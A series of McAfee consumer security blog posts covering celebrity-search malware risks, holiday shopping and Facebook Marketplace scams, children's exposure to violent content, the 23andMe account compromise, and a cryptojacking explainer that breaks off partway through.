7. Al Roker, the “Today” show’s popular meteorologist, author, and journalist.  
8. Margot Robbie, actor, producer, and multiple Academy Award and BAFTA award nominee, and the star of this summer’s hit film, Barbie. 
9. Bad Bunny, multi-platinum album singer, and the first non-English-language singer to be named as Spotify’s most streamed artist of the year.  
10. America Ferrera, actor and noted supporting star of this summer’s hit film, Barbie. 

What’s at risk when you search for these celebrities. 

The hackers behind these celebrity-driven attacks are after two primary things.  

• They want you to hand over personal info so they can use it to commit identity fraud and theft. 
• They want to infect your device with malware. That might include spyware that can steal personal info or ransomware that holds your device and its files hostage—for a price. 

Accordingly, they’ll pair celebrity names with terms like audio book, lyrics, deepfake, free ringtone, free movie, free download, MP4, among others—which generate results that lead to sketchy sites. 

In all, they target people who want to download something or get a hold of celebrity-related content in some form. Again, think of the “Barbie” movie scams earlier this year that promoted free downloads of the movie — but of course they were malware and identity theft scams. 

Searching for a celebrity name alone didn’t necessarily lead to a list of sketchy results. Our own Chief Technology Officer, Steve Grobman, described the risks well. “We know people are seeking out free content, such as movie downloads, which puts them at risk. If it sounds too good to be true, it generally is and deserves a closer look.” Yet hackers know how hungry people are for celebrity content, and unfortunately some people will go ahead and click those links that promise celebrity-filled content, despite the risks. 

Who else made the Hacker Celebrity Hot List? 

Further rounding out the list, we found several big names from sports and popular culture. 

Argentine soccer player Lionel Messi comes in at number 18 on the list, who recently made the move to Miami’s Major League Soccer team. Recent retiree and all-time American football great Tom Brady clocked in at number 19, and Travis Kelce, American football tight end for the Kansas City Chiefs, came in at number 22. NBA star Steph Curry at number 23, while Aaron Rogers, another American football legend, came in at number 31. And Serena Williams, a dominant force on the court and in culture, ranked at number 32.  

Reality and pop culture favorites also made the top 50, with Andy Cohen of “Real Housewives” fame taking the number 11 slot, followed by Kim Kardashian at number 24, and Tom Sandoval at number 40 on the list. 

And for the Swifties out there, Taylor Swift ranked 25 on our list this year. 

Also making the list — AI scams. 

Thanks to readily available AI tools, cybercriminals have increased both the sophistication and volume of their attacks. It’s no different for these celebrity-based attacks. 

According to McAfee researchers, one such AI-driven trend is on the rise: deepfakes. For example, Elon Musk. He hit number six on our list, and our researchers found a significant volume of malicious deepfake content tied to his name — often linked with cryptocurrency scams.   

Taking a sample set of the top 50 list, McAfee researchers discovered between 25 to 135 deepfake URLs per celebrity search. While there are instances of malicious deepfakes, many celebrity deepfakes fall into recreational or false advertising use cases right now. However, there is growing evidence that future deepfakes could turn deceptive — deliberately passing along disinformation in a public figure’s name. 

Staying safe while searching for celebs — and in general. 

You have every reason, and every right, to search for and enjoy your celebrity content safely. A mix of a sharp eye and online protection can keep you safe out there. 

• Go with outlets and websites you can trust. When it comes time to get your celebrity news, look for names you know. Reliable sources that have been around. The reality is that it’s not tough for hackers and scammers to quickly spin up their own (completely bogus) “celebrity news” sites. In fact, it’s rather easy, thanks in part to AI that can generate phony articles that otherwise look real.  

• Stick with legitimate streaming and download services. Whether you want to spin something from Taylor Swift’s latest album (Taylor’s version, of course) or stream movies from your favorite stars, use known and legitimate services. Yes, sometimes that means paying. Or putting up with a few ads. The illegal alternatives might be riddled with malware or ask for personal info that ends up right in the hands of hackers. 

• Don’t “log in” or provide other info. If you receive a message, text, or email, or visit a third-party website that asks for info like your credit card, email, home address, or other login info, don’t give it out. Particularly if there’s a promise for “exclusive” content. Such requests are a common tactic for phishing that could lead to identity theft. 

• Tell what’s real and what’s fake with online protection software. Comprehensive online protection software can keep celebrity scams and other scams like them at bay. First, our new McAfee Scam Protection uses smart AI to detect and warn you of scam texts and links sent your way, so you can tell what’s real and what’s fake. Second, web protection looks out for you while you search—identifying malicious links and even blocking them if you still click one by accident. Together, this is part of the full device, identity, and privacy protection you get with us. 

Whether it’s Ryan, J-Lo, or Bad Bunny – you can stay safe when you search. 

Hackers and scammers love riding the coattails of celebrities. By hijacking big names like Ryan, J-Lo, and Bad Bunny, they dupe plenty of well-meaning fans into downloading malware or handing over their personal info. 

Of course, that’s no reason to stop searching for those celebs. Not at all. Go ahead and enjoy your shows, music, and movies—and all the news, gossip, and tea surrounding them. That’s all part of the fun. Just do it with a sharp eye and the proper protection that has your back. 

The post McAfee 2023 Hacker Celebrity Hot List – Why Hackers Love Ryan Gosling so Much appeared first on McAfee Blog.

As we gear up to feast with family and friends this Thanksgiving, we prepare our wallets for Black Friday and Cyber Monday. Black Friday and Cyber Monday have practically become holidays themselves, as each year, they immediately shift our attention from turkey and pumpkin pie to holiday shopping. Let’s look at these two holidays and how their popularity can impact users’ online security, and grab a great Black Friday holiday deal from McAfee.

About the Black Friday Shopping Phenomenon

You might be surprised that “Black Friday” was first associated with a financial crisis, not sales shopping. The U.S. gold market crashed on Friday, September 24, 1869, leaving Wall Street bankrupt. In the 1950s, Black Friday was associated with holiday shopping when large crowds of tourists and shoppers flocked to Philadelphia for a big football game. Because of all the chaos, traffic jams, and shoplifting opportunities that arose, police officers could not take the day off, coining it Black Friday. It wasn’t until over 50 years later that Cyber Monday came to fruition when Shop.org coined the term as a way for online retailers to participate in the Black Friday shopping frenzy.

In conclusion, the origins of “Black Friday” are indeed surprising and far removed from the image of holiday shopping extravaganzas that we associate with the term today. These historical roots offer a fascinating perspective on the evolution of consumer culture and the significance of these shopping events in modern times.

Growth Over the Years

Since the origination of these two massive shopping holidays, both have seen incredible growth. Global interest in Black Friday has risen year-over-year, with 117% average growth across the last five years. According to Forbes, 2018’s Black Friday brought in $6.2 billion in online sales alone, while Cyber Monday brought in a record $7.9 billion.

While foot traffic seemed to decrease at brick-and-mortar stores during Cyber Week 2018, more shoppers turned their attention to the Internet to participate in holiday bargain hunting. Throughout this week, sales derived from desktop devices came in at 47%, while mobile purchases made up 45% of revenue and tablet purchases made up 8% of revenue.

So, what does this mean for Black Friday and Cyber Monday shopping this holiday season? In 2023, Adobe Analytics anticipates that Cyber Monday will maintain its status as the most significant shopping day of the season and the year, spurring a historic $12 billion in spending, reflecting a year-over-year increase of 6.1%. Online sales on Black Friday are expected to increase by 5.7% year over year, reaching $9.6 billion, while Thanksgiving is projected to grow by 5.5% year over year, amounting to $5.6 billion in spending.

If one thing’s for sure, this year’s Black Friday and Cyber Monday sales are shaping up to be the biggest ones for shoppers looking to snag some seasonal bargains. However, the uptick in online shopping activity provides cybercriminals the perfect opportunity to wreak havoc on users’ holiday fun, potentially disrupting users’ festive experiences and compromising their online security. In light of this, it is crucial to take proactive measures to safeguard your digital presence. One effective way to do so is by investing in top-tier online protection solutions. McAfee, a renowned leader in the field, offers award-winning cybersecurity solutions designed to shield you from the ever-evolving threats in the digital landscape. Explore the features of our McAfee+ Ultimate and Total Protection and be informed of the latest cyber threats with McAfee Labs. 

→ Dig Deeper: McAfee 2023 Threat Predictions: Evolution and Exploitation

Spot Those Black Friday and Cyber Monday Shopping Scams

With the surge in online shopping during Black Friday and Cyber Monday, cybercriminals are also on high alert, crafting sophisticated scams to trick unsuspecting shoppers. One common form of scam you’ll come across during this time is fraudulent websites. These sites masquerade as reputable online retailers, luring customers with too-good-to-be-true deals. Once shoppers enter their personal and financial data, the criminals behind these sites gain access to the sensitive information, paving the way for identity theft.

Phishing emails are another popular mode of scam during these shopping holidays. Shoppers receive emails that appear to be from legitimate stores advertising incredible deals. The emails typically contain links that direct users to a fraudulent website where their information can be stolen. It’s essential to approach every email suspiciously, checking the sender’s information and avoiding clicking on unsolicited links.

→ Dig Deeper: How to Protect Yourself From Phishing Scams

How to Protect Yourself from These Scams

Thankfully, there are steps you can take to protect yourself when shopping online during Black Friday and Cyber Monday. First, always ensure that the website you’re shopping from is legitimate. Check for the padlock icon in the address bar and “https” in the URL, as these are indicators of a secure site. Steer clear of websites that lack these security features or have misspelled domain names, as they could be fraudulent.

McAfee Pro Tip: When browsing a website, there are several essential cues to consider when assessing its safety. As mentioned, one such indicator is the presence of “https” in the website’s URL. But there are also other tell-tale signs, such as fake lock icons, web copy, web speed, and more. Know how to tell whether a website is safe.

Furthermore, never provide personal or financial information in response to an unsolicited email, even if it appears to be from a trusted source. If the offer seems tempting, visit the retailer’s official website and check if the same deal is available there. Finally, consider installing a reputable antivirus and security software, like McAfee, that can provide real-time protection and alert you when you stumble upon a malicious website or receive a phishing email.

Final Thoughts

Black Friday and Cyber Monday are prime opportunities for consumers to snag once-a-year deals and for cybercriminals to exploit their eagerness to save. However, being aware of the prevalent scams and knowing how to protect yourself can save you from falling prey to these ploys. Always strive to shop smart and stay safe, and remember that if an offer seems too good to be true, it probably is.

The post Secure Your Black Friday & Cyber Monday Purchases appeared first on McAfee Blog.

Reels of another kind rack up the views online. Stories about Facebook Marketplace scams. 

Recently, TikTok’er Michel Janse (@michel.c.janse) got well over a million views with a most unusual story about selling furniture on Facebook Marketplace—and how it led to identity theft. 

@michel.c.janse

oops dont fall for this scam like me

♬ original sound – Michel Janse

The story goes like this: 

A buyer reached out about the furniture Michel was selling, expressed interest, and then hesitated. Why the cold feet? The buyer wanted to speak to Michel on the phone to confirm that Michel was a real person. “Are you OK if I voice call you from Google?” Michel agreed, sent her number, and soon received a text with a Google Voice code. The buyer asked for the code, and as soon as Michel sent it, she got that sinking feeling. “I should have Googled before I did, because something feels really off.” 

As she found out, it was. The scammer ghosted the conversation and ran off with the verification code. 

This is a variation of the “Verification Code Scam,” where scammers ask you to send them that six-digit code you receive as part of an account login process. Here, scammers send a text message with a Google Voice verification code and ask you to send them that code. With it, they can create a Google Voice number linked to your phone number—and go on to commit other forms of identity theft in your name. 

It happens so often that the U.S. Federal Trade Commission (FTC) has a page dedicated to the topic. Luckily, Michel got wise quickly enough. She quickly asked for another code and took back charge of that newly created Google Voice account. 

This is just one of the many scams lurking about on Facebook Marketplace. Largely, Facebook is a great place packed with lots of great deals, yet you can get stung. But if you know what to look out for, you can spot those scams and steer clear of them when you do. 

The top scams on Facebook Marketplace to look out for. 

As the saying goes, buyer beware. And seller too. Scammers weasel their way into both ends of a transaction. Per Facebook, in addition to phishing attacks, scams on Facebook Marketplace take three primary forms: 

A buyer scam is: When someone tries to buy or trade items from someone else without paying, resulting in a loss of money for the seller and a gain for the buyer. This might look like a buyer who: 

• Reports their transaction as fraud after they receive the item(s) from you. 

• Claims they never received the item(s) from you when they did. 
• Doesn’t pay for an item that they received. 

An example, a scammer sends a seller a pre-paid shipping label to mail the item. Then they change the address via their tracking number and claim they never received the goods.  

A seller scam is: When someone tries to sell or trade items to someone else without delivering the items as promised, resulting in a gain of money for the seller and a loss for the buyer. This might look like a seller who: 

• Purposely sends you something significantly different than what you paid for. Example: someone sells you a used item that they listed as “new” on Facebook Marketplace. 

• Claims they shipped the item(s) to you when they didn’t. 
• Asks you to send them money as a deposit for a high-value item without letting you confirm it’s real first. 

An example, a scammer offers up a game console—one that doesn’t work when you take it home and plug it in. 

A listing scam is: When a listing appears to be dishonest, fake, or lures buyers to complete transactions outside Facebook Marketplace. This might look like a listing: 

• Of a product with a suspiciously low price on Facebook Marketplace. This can be a sign that it’s a fake item or listing. 

• With a description encouraging buyers to reach out to the seller outside Marketplace. 

An example, you see a great price on a commuter bike, yet the seller wants to complete the transaction over text. And using a payment form not covered by Facebook’s purchase protection policies, such as Venmo or Zelle. 

Shopping safely and scam-free on Facebook Marketplace. 

Like any transaction you make through social media, a few extra steps and a dose of buyer or seller beware can help you make a great purchase or sale. One that’s safe. 

• Check out the person’s profile: Michel mentioned getting a “vibe check” from her buyer by looking at their profile. Take it a step further and investigate closely. While not foolproof, it can help you spot an obvious fake account. Look for an account that’s only recently been created or that has next to no other activity. Those might be red flags. Also, try a reverse-image search of the person’s profile picture. Some scammers pull stock photos and other pictures off the internet to round out their bogus Facebook profiles. 

• Consider doing your deals locally: Many of the scams listed above rely on items that are shipped. By shopping locally, you can inspect the item you’d like to purchase and get a sense if it’s a deal or not. For example, you could ask the seller to show that the game console you want to buy actually works. Likewise, you can avoid all manner of shipping-based scams on Facebook by conducting your transaction in person. 

• Deal in public or with a pal: When selling or making a purchase, do it somewhere safe—one that’s well-lit and has some people around, if at all possible. Also, bring a friend and let others know where you’re going and what you’re doing. 

• Stick with Facebook Marketplace: If you choose to purchase an item that’s shipped, conduct your transaction on Facebook. By using its approved payment methods, you can gain the purchase protections mentioned above. Don’t use online payment methods like Zelle or Venmo, which aren’t protected by Facebook currently. 

• Document the transaction: Save any communications with your buyer or the seller in the event there is an issue. Keeping communications on Facebook provides an excellent record of your interactions in the event you end up getting scammed. 

Ugh! I got scammed on Facebook! Now what? 

You can take three big steps to help set things straight. 

1. The first step involves filing a police report. That in itself might not resolve the issue, yet it’ll get you a case number that you can reference in your claims moving forward. It provides law enforcement with knowledge that a crime has taken place, along with important data and info that they can use moving forward. 
2. Also report the scam to the Federal Trade Commission (FTC) at https://reportfraud.ftc.gov. Likewise, this provides the FTC with vital info that helps them track trends and that it can share with its law enforcement partners. For example, scammers often run in rings. Data can help identify and shut them down. 
3. Next, report your scam to Facebook. Make your claim, provide your records, and see about getting a refund. Also notify Facebook of the scammer’s account so that they can take action against it as needed. Whether it’s a seller, buyer, or listing you want to report, Facebook has full instructions for reporting scams on its site. 

Stay safer still from scammers online. 

Whether shopping on Facebook Marketplace or off, a combination of online protection software and smart habits can help you avoid getting scammed. Further, online protection can provide you with yet more ways of preventing and recovering from identity theft. 

• Use two-form authentication—and never share your number with anyone. Two-factor authentication makes it tougher to hack into an online account by using a six-digit code as part of the login process. Hackers know this and will try and hoodwink you into providing it. Just as Michel found out. Keep that number to yourself. Always. 

• Use a credit card rather than a debit card for purchases. When fraud occurs with a debit card, you fight to get your money back—it’s gone straight out of your account. With a credit card, the issuer fights to get their money back. They’re the ones who take the financial hit. Additionally, in the U.S., the Fair Credit Billing Act gives citizens the power to dispute charges over $50 for goods and services that were never delivered or otherwise billed incorrectly. Note that many credit card companies have their own policies that improve upon the Fair Credit Billing Act as well.  
• Monitor your credit, transactions, and personal info online. That was once quite the task. Now, comprehensive online protection software like ours can do all that for you. And then some. It can prevent identity theft by cleaning up your personal info and old accounts online. It can notify you when unusual activity occurs in bank, credit, retirement, and other online accounts. If your info winds up on the dark web, it can alert you of that too, and offer next steps for action. And if you do end up as a victim of identity theft, a licensed restoration pro can help you recover—plus provide covers that can help recover your losses.  

Scams are crimes. And you can prevent them. 

We’d like to thank Michel and all the others who have shared their stories. Getting scammed stings. That’s why people often fail to report it, let alone share that it happened to them. Yet scams are crimes. Without question, act and report on a scam for the crime that it is. Get the proper platforms and authorities involved. 

Keep in mind the larger picture as well. Scams aren’t always one-offs. Organized crime gets in on scams as well, sometimes on a large scale. By acting and reporting on scams, you provide those platforms and authorities mentioned above with vital info that can help them shut it down. 

Your best defenses are your nose and your online protection software. As Michel said, something felt off in her interaction. So, if something doesn’t pass the sniff test, pay attention to that instinct. Shut down that purchase or sale on Facebook Marketplace—and report it if you think it’s a scam. You might save someone else some heartache down the road. 

The post The Top Facebook Marketplace Scams to Look Out For appeared first on McAfee Blog.

We’re not the only ones looking forward to the big holiday sales like Black Friday and Cyber Monday. Hackers are too. As people flock to retailers big and small in search of the best deals online, hackers have their shopping scams ready.

The Human Element of Cybercrime

One aspect of cybercrime that deserves a fair share of attention is the human element. Crooks have always played on our feelings, fears, and misplaced senses of trust. It’s no different online, particularly during the holidays. We all know it can be a stressful time and that we sometimes give in to the pressure of finding that hard-to-get gift that’s so hot this year. Crooks know it, too, and they’ll tailor their attacks accordingly as we get wrapped up in the rush of the season.

→ Dig Deeper: Unwrapping Some of the Holiday Season’s Biggest Scams

Spotting Online Shopping Scams

As you hone your skills in recognizing fantastic bargains every Black Friday, it’s equally crucial to familiarize yourself and your family with techniques to detect online shopping scams. Safeguarding your financial well-being during this shopping season requires a combination of savvy shopping and vigilance. Here are some key strategies to help you steer clear of potential online scams:

Email attachments that pretend to be from legitimate retailers and shippers

A standard scam hackers use is introducing malware via email attachments, and during the holiday sale season, they’ll often send malware under the guise of offering emails and shipping notifications. Know that retailers and shipping companies won’t send things like offers, promo codes, and tracking numbers in attachments. They’ll call those things out in the body of an email instead.

→ Dig Deeper: Phishing Email Examples: How to Recognize a Phishing Email

Typosquat trickery

A classic scammer move is to “typosquat” phony email addresses and URLs that look close to legitimate addresses of legitimate companies and retailers. They often appear in phishing emails, and instead of leading you to a great deal, these can, in fact, link you to scam sites that can then lift your login credentials, payment info, or even funds should you try to place an order through them. You can avoid these sites by going to the retailer’s site directly. Be skeptical of any links you receive by email, text, or direct message—it’s best to go to the site yourself by manually typing in the legitimate address yourself and looking for the deal there.

Copycat deals and sites

A related scammer trick that also uses typosquatting tactics is to set up sites that look like a trusted retailer or brand could run them but are not. These sites may tout a special offer, a great deal on a hot holiday item, or whatnot, yet such sites are one more way cybercriminals harvest personal and financial information. A common way for these sites to spread is by social media, email, and other messaging platforms. Again, a “close to the real thing” URL is a telltale sign of a copycat, so visit retailers directly.

A comprehensive online protection software can prevent your browser from loading suspicious sites and warn you of suspicious sites in your search results. Alternatively, a safe browsing software like McAfee WebAdvisor can also add an extra layer of security to your browsing experience. 

Counterfeit Shopping Apps

Not every app that you’ll find on your mobile store is legitimate. Some are slyly designed to imitate trusted brands, but in reality, they are there to feed off your personal and financial information. These counterfeit apps can appear professional, which makes them hard to detect. To prevent falling into this kind of scam, it is advisable to use the app link from the retailer’s website. Visit the website using your mobile browser and search for a link to their app on the website. When using Safari on iOS, if the website has an app available, you’ll see a prompt at the top that gives you the option to either open the page in the app or download it if it’s not already on your device.

Moreover, be careful and only download apps from legitimate app stores like Google Play and Apple’s App Store, which have measures to prevent malicious apps. However, some manage to sneak in before they are detected. In this case, check for the publisher’s name and make sure it is the actual retailer you’re looking for. Other indicators of a fake app include typos, poor grammar, and imperfect design.

McAfee Pro Tip: Review a report concerning your app’s access to your personal information to enable informed decision-making for each app. Explore this blog for insights on preventing malicious apps.

The “Too Good to Be True” Offer

The holiday season is a critical time for shopping. Retailers have special offers for a limited time and popular holiday items that are difficult to find, which creates a sense of scarcity. This makes it the perfect time for scammers to launch their schemes. They leverage this urgency and create “too good to be true” offers on their fake sites. If the price, availability, or delivery time seems too advantageous, it might be a scam designed to steal your personal data and money. Therefore, be cautious before you click on any link.

If you’re unsure about an offer or a retailer, take a moment to check their reviews on trusted websites. This can help you discern whether it’s a legitimate deal or a scam. Do not rush into buying an item without doing proper research. Remember, if it is too good to be true, it probably is.

→ Dig Deeper: Online Shopping Festivals – Things to Do Before Clicking on Add to Cart

Final Thoughts

The holiday season is a prime time for online shopping scams. Cybercriminals know that people are in a rush to get the best deals, and they take advantage of this. They use tactics like malware-laden email attachments, typosquatting, counterfeit sites, and apps, and unbelievable offers to trick unsuspecting shoppers. However, by being aware of these schemes and knowing how to spot them, you can protect yourself and ensure a safer online shopping experience.

One key takeaway is to always double-check before clicking on any link or making a purchase. If an offer seems too good to be true, it probably is. Remember to download a trusted protection software like McAfee Total Protection to give you an extra layer of security. It is advisable to use credit cards instead of debit cards while shopping online and consider using virtual credit cards for further protection. Finally, never give in to stress and scarcity. Take your time to make informed decisions and enjoy a safe shopping season.

The post Spot Those Black Friday and Cyber Monday Shopping Scams appeared first on McAfee Blog.

Amidst the recent heartbreaking events in the Middle East, parents now face the challenge of protecting children from the overwhelming amount of violent and disturbing content so easily accessible to children online.  

Reports of unimaginable acts, including graphic photos and videos, have emerged on popular social networks, leading child advocates to call for heightened monitoring and, in some cases, the removal of these apps from children’s devices. According to a recent investigation by The Institute for Strategic Dialogue, the team adopted the personas of 13-year-olds to establish accounts on Instagram, TikTok, and Snapchat. During a 48-hour period spanning from October 14 to 16, the researchers unearthed over 300 problematic posts. Surprisingly, a significant majority of these problematic posts, approximately 78%, were discovered on Instagram, with Snapchat hosting about 5% of them. 

In today’s digital age, the consensus is clear: keeping older children informed about global events is important. However, given the abundance of real-time, violent content, the urgency to protect them from distressing material that could harm their mental well-being has become even more imperative. 

In such times, there isn’t a one-size-fits-all strategy, but we can provide valuable tips to help you monitor and minimize your child’s exposure to violent content. 

10 Ways to Limit Your Family’s Exposure to Online Violence 

1. Safeguard Screen Time: It’s natural if you are anxious about your child’s exposure to online content right now. Listen to that inner voice and be proactive with all screen time including television. A practical approach is to limit device access. For younger children, consider using a family device instead of a personal one to manage screen time more effectively. Know where the remote is and explain why you are making changes. 
2. Get Serious about Parental Controls: Technology can be your ally during times of global crisis. Parental control features enable you to not only block inappropriate content but also regulate screen time. Consider apps that have built-in parental controls that can be customized to the age of your child and give you the added protection and peace of mind needed right now. 
3. Talk Openly and Honestly. Don’t be shy about engaging your child in open and honest conversations about what’s going on in the world right now. Chances are, they’re already getting the information anyway, or absorbing the stress anyway. Depending on age, explain the basics of the conflict and why it’s dominating the news and online conversations. Encourage your children to ask questions and share their thoughts and concerns.
4. Monitor Their Digital Circles: Keep a watchful eye on your child’s online activities, especially during sensitive times when it’s unclear what kind of content they may see online. This includes online gaming platforms and messaging apps. Installing parental control software is important but so is listening to what and how your child (and his or her peers) posts, comments on, and shares.
5. Zero in on Media Literacy: Propaganda and misinformation is rampant, especially in connection with a geopolitical conflict. Teach your children the art of critical thinking and challenge them to level up their media literacy. Help them discern the difference between reliable sources and disinformation campaigns. Teach them to how to question the information and opinions they encounter online.
6. 6. Implement a Digital Detox: During periods of particularly distressing news coverage, urge your child to take breaks from the news and model that decision as well. Engage with them in alternative activities and hobbies that foster relaxation and well-being, balancing their online exposure.
7. Family News Time: If age-appropriate, make watching the news a family affair. This practice allows you to explain and discuss what’s happening and address any questions or concerns your child may have in real-time.
8. Empathy and Compassion: Foster discussions about the importance of empathy and compassion for those suffering due to conflicts. Encourage your child to engage in activities that promote understanding and kindness.
9. Review Reporting Channels: If your child is online be sure they know how to report disturbing or inappropriate content on their favorite apps, games, or social sites. Most platforms have mechanisms for flagging or reporting such content, which empowers children to be active participants in online safety.
10. Seek Professional Support if Needed: What’s happening in the world is distressing and can ignite confusion, fear, and anxiety in a child. Every child is unique so if you notice signs of distress, anxiety, or trauma due to exposure to violent online content, don’t hesitate to seek professional help from a therapist or counselor. Their expertise can be invaluable in times of need.

To wrap up, don’t lose sight of mental and physical well-being by implementing the strategies mentioned here. By setting a strong example of a balanced digital life and open communication about real-life crises, your children will naturally pick up on how to navigate the online world. Your actions speak volumes, and they will follow your lead.

The post Digital Strategies to Safeguard Your Child from Upsetting and Violent Content Online appeared first on McAfee Blog.

A hacker claims to have hijacked profile information of “millions” of users from the popular genetic testing site 23andMe.com.  

What’s at risk? Some of the most personal info possible. The profile info varies by user, which plans and services they’ve selected, and how the hacker accessed it. Yet it potentially includes personal info like name, sex, birth year, current location, and some details about genetic ancestry and health results. 

23andMe continues to keep its users informed of the hijacked accounts on its blog. As of October 9, they shared the following: 

“While we are continuing to investigate this matter, we believe threat actors were able to access certain accounts in instances where users recycled login credentials – that is, usernames and passwords that were used on 23andMe.com were the same as those used on other websites that have been previously hacked.” 

Currently, it appears that 23andMe’s systems weren’t breached. Rather, it appears human error is to blame—people who reused the same compromised passwords across different sites led to their accounts being compromised.  

However, the attacker gained access to info from many users who were not themselves compromised but opted in for the DNA Relatives feature. According to 23andMe, DNA Relatives works like so:  

If you choose to opt in and participate in DNA Relatives, all your matches will be able to view the following information about you: 

• Your display name. 
• Your profile gender. 
• Your profile picture. 
• Your predicted relationship. 
• The percent DNA and number of segments you share, but not the location of those segments.
• Relatives in common. 

This widens the impact of the attack yet more. Users who have compromised accounts might contain info from uncompromised accounts because both parties have opted in for the DNA Relatives feature. In this way, one hack potentially leads to broader information leakage. Even if the other users have secure passwords.  

Per reports, the hacker claiming responsibility has offered it up for sale on a dark web forum. As an apparent example of how the data can be packaged, the hacker listed alleged data of one million Jewish Ashkenazi users—people of Central or Eastern European Jewish descent. Another has reportedly listed 100,000 alleged records of people of Chinese descent.  

What steps has 23andMe taken to protect its users? 

Per the company’s statement on its blog, “If we learn that a customer’s data has been accessed without their authorization, we will notify them directly with more information.” Moreover, the company said, 

“Our investigation continues and we have engaged the assistance of third-party forensic experts. We are also working with federal law enforcement officials.  

We are reaching out to our customers to provide an update on the investigation and to encourage them to take additional actions to keep their account and password secure. Out of caution, we are requiring that all customers reset their passwords and are encouraging the use of multi-factor authentication (MFA).”

Additionally, we suggest you take those steps and more. 

The three steps every 23andMe user must take right away. 

As potentially unsettling this news may come, 23andMe users can take the following steps. They’ll secure your accounts moving forward and help you fend off attempts at identity theft. 

1. Change your passwords immediately: Given the attack, 23andMe has forced all its users to reset their passwords. However, changing passwords is not enough. Every password must be strong and unique. For every account. If that sounds like a task, a password manager can help. It creates strong, unique passwords—and stores them securely. This way, you can avoid falling victim to attacks where bad actors try to use passwords stolen from one account to break into another. That’s the beauty of no-repeat passwords. 
2. Use multi-factor authentication (MFA): Many online accounts offer MFA, also known as 2-factor authentication or 2FA. It adds an extra step to the login process, such as sending a six-digit code to your phone with a call or text. If your accounts support this, use it. It makes it far more difficult for hackers to break into your account—even if they end up with your password. Also, never provide an authentication number to anyone else. It’s yours, and yours alone. Treat it like the secret code it is. Specific to 23andMe users, you can enable MFA with the instructions on this page. 
3. Monitor your identity, credit, and transactions: In the wake of any attack where your personal info might be at risk, keep an eye on all things you. Your bank accounts, credit cards, online finances, and your credit rating. Hackers view personal info as a gold mine. Rightly so. With it, they can go on to compromise other accounts or commit other identity crimes. Like file insurance claims or open new lines of credit in your name. Comprehensive online protection software can help you spot unauthorized account activity, changes in your credit report, or if your personal info winds up on the dark web. It saves you hours and hours of effort, and it gives you assurance that all’s well with a quick glance. 

Look into identity theft protection

Our Identity Theft & Restoration Coverage can help you set things straight if identity theft happens to you. Licensed recovery experts can take steps to repair your identity and credit. Further, you gain up to $2 million in coverage for lawyer fees, travel expenses, and stolen funds reimbursement. This offers you stronger assurance lifts the time and financial burden of identity theft off your shoulders. 

And for everyone, consider what you share online. 

Far and beyond 23andMe users, everyone who goes online should take note of this attack. Which is pretty much all of us. It makes one of the strongest cases for strong, unique passwords—and for limiting the info you share online. In this case, even a secure password was no help in protecting the personal info of millions of people. 

If you’re a 23andMe user, you can opt out of DNA Relatives by selecting the Manage Preferences option within DNA Relatives or from your Account Settings page. Granted, this will remove your ability to gain deeper genetic insights from other users, yet it will offer additional protection if a similar attack occurs. 

For all of us, sharing and storing personal info is a fact of life online. The more you share and store online, the more risk you take on. And you have some control over that. 

Consider what you’re sharing, who you’re sharing it with, what they do with that info, who they share it with, and in what form and circumstances. Yes, that’s a lot to consider. Complicating that yet more, many of the sites, services, and apps we use don’t make it easy to answer those questions. Terms of service and data policies rarely make for light and understandable reading.  

Luckily, you can turn to trustworthy resources to get answers. The Common Sense Privacy Program evaluates privacy policies with K-12 students in mind. The Mozilla Foundation’s Privacy Not Included website scores apps and connected devices for privacy, including apps, smart home devices, and cars.   

In an otherwise murky landscape, the privacy question is this: is the reward worth the risk? If you share that info, are you okay with someone unwanted accessing it? Particularly if the privacy risks are tough to spot. 

Put simply, less sharing means more privacy. Put careful thought into when and where you share. And with whom. 

Shut down your old accounts for yet more privacy and security. 

On that note, it might be time for a cleanup. 

We’ve logged into all kinds of things over the years. Many of which we don’t log into anymore. And others we’ve completely forgotten about. Across these forums, sites, and stores, you’ll find your personal info to some degree or other. If one of those sites gets compromised, your personal info stored there might get compromised too. That gives you a solid reason to delete those old accounts. 

A tool like our Online Account Cleanup can help remove your info from online accounts. You’ll find it in our online protection software, along with our Personal Data Cleanup—which helps remove your personal info from risky data broker sites. It shows you where your personal info was found, and what data the sites have. Depending on your plan, it can help clean it up. 

The 23andMe compromised data—a wakeup call for all of us. 

The 23andMe story continues to develop. Yet we’ve already (re)learned a big lesson from all of this. Strong, unique passwords are an absolute must. And the stakes for online privacy have never been higher. 

Today we entrust the internet with so much, which increasingly includes our heath and wellness info, not to mention genetic info with services like 23andMe. Taking the steps outlined here can help protect yourself from invasions of privacy and the loss of personal info. And as we’ve seen, protect others too. Consider them whether you’re a 23andMe user or not. 

The post User Data from 23andMe Leaked Online – What Users Should Do, and the Rest of Us Too appeared first on McAfee Blog.

Your pain is their gain. That’s how things go in a cryptojacking attack.

Cryptomining is the utilization of computers to run processor-intensive computations to acquire cryptocurrency. Cryptojacking involves hijacking a device and using it to mine cryptocurrency for profit. It’s a form of malware that saps your device’s resources, making it run sluggish and potentially overheating it as well.

Meanwhile, the hackers behind those attacks generate cryptocurrency by hijacking your device and thousands of others like it. Together they create virtual illicit networks that turn them a profit.

However, you can absolutely prevent it from happening to you. That starts with a closer look at who’s behind it and how they pull it off.

How cryptojacking works.

What lures hackers to cryptojacking? It’s big business. Gone are the early days when practically anyone with a standard computer could participate in the cryptomining process. Today, the proverbial field is flooded with miners competing against each other to solve the cryptographic puzzles that earn a cryptocurrency reward. Profitable miners run farms of dedicated mining rigs that cost thousands of dollars each.

Visualize row after row of racks after racks stacked with mining rigs in hyper-cooled warehouses. That’s what industrialized cryptomining looks like nowadays.

To put it all into perspective, one study estimated that “(t)he top 10% of [Bitcoin] miners control 90% and just 0.1% (about 50 miners) control close to 50% of mining capacity.” That makes cryptomining a difficult field to break into. And that’s why some people cheat.

Enter the cryptojackers. These hackers forgo the massive up-front and ongoing costs of a cryptomining farm. Instead, they build their cryptomining operations off the backs of other people by hijacking or “cryptojacking” their devices. In doing so, they leach the computing resources of others to mine their cryptocurrency.

Cryptojackers will target just about anyone—individuals, companies, and governmental agencies. They’ll infiltrate phones, laptops, and desktops. In larger instances, they’ll go after large server farms or an organization’s cloud infrastructure. This way, they get the computing power they need. Illegally.

As to how cryptojackers pull that off, they have a couple of primary options:

• Malware-based delivery, where a victim’s device gets infected with cryptojacking code through a phishing attack or by installing an app laced with cryptomining
• Browser-based delivery, where cryptojackers compromise a victim’s browser while they visit a site that hosts cryptomining code. Sometimes cryptojackers create malicious sites for this specific purpose. In other instances, they infect otherwise legitimate sites.

